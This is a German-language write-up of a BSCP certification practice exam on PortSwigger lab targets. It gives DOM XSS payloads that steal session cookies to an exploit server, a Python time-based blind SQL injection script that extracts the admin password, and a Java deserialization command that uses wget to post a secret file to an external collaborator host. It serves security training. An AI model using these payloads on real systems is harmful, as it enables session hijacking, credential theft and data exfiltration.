> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/bscp-certification-practical-guide/writeup-practice-exam-2-bscp.md).

# Ausarbeitung zur BSCP-Prüfung 2

## Phase 1: Erstzugriff (DOM XSS & Cookie-Diebstahl)

Vektor: JavaScript über einen Suchparameter in das DOM einschleusen (`find`). Herausforderung: Vorhandensein von Filtern/WAFs, die die Verwendung bestimmter Zeichen einschränken.

#### 1. Analyse und Umgehung

Nach mehreren Tests, um die bestehende JSON/JavaScript-Struktur zu verlassen:

```javascript
"};alert`1`//
","a":alert1}//
"-alert`1`-"
```

#### 2. Exfiltrations-Payload

Ziel ist es, den Administrator auf unseren Exploit-Server umzuleiten, indem sein Sitzungs-Cookie mitgeführt wird.

Umleitungs-Payload: `"};location='https://[EXPLOIT-SERVER]/log?c='+document.cookie;//`

{% code overflow="wrap" %}

```bash
"};location='https://exploit-0aa20067041b291b83a6ea7c0130006e.exploit-server.net/?c='+document.cookie;//
```

{% endcode %}

Finaler Exploit (über den Exploit-Server auszuliefern):

```javascript
<script>
  location = "https://0a79004d04a329a7830bebde00dd0088.web-security-academy.net/?find=%22%7D%3Blocation%3D%27https%3A%2F%2Fexploit-0aa20067041b291b83a6ea7c0130006e.exploit-server.net%2F%3Fc%3D%27%2Bdocument.cookie%3B%2F%2F";
</script>
```

## Phase 2: Privilegieneskalation (zeitbasierte SQLi)

Vektor: SQL in den `order` Parameter der gefilterten Suche einschleusen. Datenbank: PostgreSQL.

#### 1. Injektionsvalidierung

Die Injektion wird mit einer einfachen Bedingung bestätigt, die die Sortierung nicht unterbricht: `ASC,(CASE WHEN (1=1) THEN 1 ELSE 2 END)`

#### 2. Automatisierung der Extraktion (Blind-SQLi)

Da die Anwendung keinen direkten Fehler mit dem Inhalt zurückgibt, verwendet man einen zeitbasierten Angriff.

Payload-Logik: Das Skript prüft das `Administrator` Passwort Zeichen für Zeichen. Wenn das Zeichen korrekt ist, wartet die Datenbank 3 Sekunden (`pg_sleep(3)`).

Python-Extraktionsskript:

```python
import requests
import time

url = "https://[LAB-ID].web-security-academy.net/filtered_search"
cookies = {"session": "your_session_id"}
charset = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""

for i in range(1, 21):
    for char in charset:
        # PostgreSQL-Zeit-Payload
        payload = f"ASC,(SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username='administrator'),{i},1)='{char}') THEN (SELECT 1 FROM pg_sleep(3)) ELSE 1 END)"

        params = {"find": "", "organize": "5", "order": payload}

        start = time.time()
        requests.get(url, params=params, cookies=cookies)

        if (time.time() - start) >= 2.8:
            password += char
            print(f"[+] Buchstabe {i}: {char} -> {password}")
            break
```

## Phase 3: Dateisystemzugriff (Java-Deserialisierung)

Zweck: Die `/home/carlos/secret` Datei über unsichere Deserialisierung lesen.

#### 1. Cookie-Analyse

Das `admin-prefs` Cookie enthält ein serialisiertes Java-Objekt, mit Gzip komprimiert und in Base64 kodiert.

{% code overflow="wrap" %}

```bash
Cookie: admin-prefs=H4sIAAAAAAAA%2fzWPPU7DQBCFF0RSQcMJpkOi2PTQEH4iCkcKClJEOV6Pk8HrHbO7dmKQOA4VJ%2bAI3IU7sBahm%2fn09PS9zx81Cl6dW8w1msjigjZS1%2bJ0IM9o%2bRVzS3pa1OwWnsrw9vUxDqvv7FAdZeq4xE48R5qJFFGdZs%2fY4cSiW0%2bW0bNbX2bq5D%2fz0EqkF%2fWuDvawHei1SLWHo7ih%2bi%2bxa6Iab5kc%2baiu5j04rAk4wA16KwHm4qL0qOFJWqjYWiqg7qHEVOE1JNMGPUEUKJh0VIvHDcGKcpg2jWWDw1K4R1ORPwvpcEWePC7gloORjgZ1SBDudo0VjsO7JDMI9zCzuA1JT3zaSb9PDWuHQgEAAA%3d%3d;
```

{% endcode %}

#### 2. Generierung des Payloads (Yesserial)

Bei dieser zweiten Überprüfung ist die identifizierte verwundbare Bibliothek CommonsCollections7.

Generierungssteuerung:

{% code overflow="wrap" %}

```bash
CommonsCollections7 '/usr/bin/wget --post-file /home/carlos/secret https://kpd4qvnp2c1ae8xbhncxyu0fl6rzfp3e.oastify.com'
```

{% endcode %}

#### 3. Umsetzung

Vorgehen: Binärdatei in Gzip komprimieren -> in Base64 kodieren -> Wert ersetzen in `admin-prefs` Cookie verändert.

<figure><img src="/files/f3cf87e09f90602f1f74ec6a26415a3869e8b508" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/bscp-certification-practical-guide/writeup-practice-exam-2-bscp.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
